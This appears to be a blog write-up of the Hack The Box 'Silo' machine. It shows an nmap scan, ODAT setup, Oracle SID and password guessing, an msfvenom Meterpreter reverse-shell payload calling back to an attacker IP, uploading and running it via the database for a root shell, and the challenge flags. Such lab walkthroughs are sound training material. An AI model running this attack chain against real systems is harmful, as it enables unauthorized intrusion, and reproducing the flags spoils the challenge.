Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Silo Windows

Published on 10 Aug 2019
Tools and techniques used, ODAT, msfvenom

Recon

Basic_10.10.10.82.nmap 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.046s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Exploitation: Oracle Database Attacking Tool

We gonna use install ODAT to query the Oracle database and find away to exploit it

https://github.com/quentinhardy/odat
cd odat/
git submodule init
git submodule update
sudo apt-get install libaio1 python-dev alien python-pip

Get instant client basic, sdk (devel) and sqlplus from the Oracle web site:

X64: http://www.oracle.com/technetwork/topics/linuxx86-64soft-092277.html

Generate DEB packages from rpm packages

alian --to-deb *.rpm

Install deb packages

dpkg -i *.deb

Finally we need to edit our /etc/profile and put the following PATH lines

export ORACLE_HOME=/usr/lib/oracle/19.3/client64/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

Sometimes when try to run oday.py will throw an error saying that cx_Oracle dependency module is missing. If that happens

pip2 install cx_Oracle

odat

We start odat and we use the module sidguesser

python odat.py sidguesser -s 10.10.10.82 -p 1521

Sidguesser returns two potential valid SID: XE,XEXDB

Time to get some creds by usin passwordguesser

python odat.py passwordguesser -s 10.10.10.82 -d XE

Valid credentials found: scott/tiger.

We gonna use the utlfile module to upload a reverse shell using msfvenom

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=9999 -f exe -o evil.exe
python odat.py utlfile --sysdba -s 10.10.10.82 -d XE -U scott -P tiger --putFile /temp evil.exe /root/
Desktop/evil.exe

Then we gonna exec our shell using the externaltable module from odat python odat.py externaltable –sysdba -s 10.10.10.82 -d XE -U scott -P tiger –exec /temp evil.exe

Finally we got root shell.

FLAGS

ROOT : "cd39ea0af657a495e33bc59c7836faf6"
USER : "92ede778a1cc8d27cb6623055c331617"

Related posts